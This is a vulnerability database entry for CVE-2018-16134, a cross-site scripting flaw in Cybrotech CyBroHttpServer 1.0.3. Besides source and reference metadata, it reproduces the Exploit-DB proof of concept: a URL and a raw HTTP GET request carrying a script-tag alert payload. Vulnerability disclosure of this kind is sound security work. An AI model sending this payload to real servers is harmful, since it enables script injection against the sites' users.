Details of VAR-E-201808-0179

ID

VAR-E-201808-0179

CVE

cve_id:

CVE-2018-16134

Trust: 2.1

sources: PACKETSTORM: 149178 // EXPLOIT-DB: 45309 // EDBNET: 99139

EDB ID

45309

TITLE

Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting - Windows_x86-64 webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45309

DESCRIPTION

Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting. CVE-2018-16134 . webapps exploit for Windows_x86-64 platform

Trust: 0.6

sources: EXPLOIT-DB: 45309

AFFECTED PRODUCTS

vendor:

cybrotech

model:

cybrohttpserver

scope:

version:

1.0.3

Trust: 2.1

sources: PACKETSTORM: 149178 // EXPLOIT-DB: 45309 // EDBNET: 99139

EXPLOIT

# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows 7 - 64-bit
# CVE-2018-16134

# PoC
http://<host>/<script>alert('xss');</script>

GET <script>alert('xss');</script> HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Trust: 1.0

sources: EXPLOIT-DB: 45309

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 45309

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45309

TYPE

Cross-Site Scripting

Trust: 1.6

sources: EXPLOIT-DB: 45309 // EDBNET: 99139

CREDITS

Emre ÖVÜNÇ

Trust: 0.6

sources: EXPLOIT-DB: 45309

EXTERNAL IDS

db:	NVD	id:	CVE-2018-16134	Trust: 2.1
db:	EXPLOIT-DB	id:	45309	Trust: 1.6
db:	EDBNET	id:	99139	Trust: 0.6
db:	PACKETSTORM	id:	149178	Trust: 0.5

sources: PACKETSTORM: 149178 // EXPLOIT-DB: 45309 // EDBNET: 99139

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2018-16134	Trust: 2.1
url:	https://www.exploit-db.com/exploits/45309/	Trust: 0.6

sources: PACKETSTORM: 149178 // EXPLOIT-DB: 45309 // EDBNET: 99139

SOURCES

db:	PACKETSTORM	id:	149178
db:	EXPLOIT-DB	id:	45309
db:	EDBNET	id:	99139

LAST UPDATE DATE

2022-07-27T09:58:20.485000+00:00

SOURCES RELEASE DATE

db:	PACKETSTORM	id:	149178	date:	2018-08-31T00:46:18
db:	EXPLOIT-DB	id:	45309	date:	2018-08-30T00:00:00
db:	EDBNET	id:	99139	date:	2018-08-30T00:00:00

tag:	Cross-Site Scripting (XSS)	Trust: 1.0
tag:	exploit	Trust: 0.5
tag:	xss	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES RELEASE DATE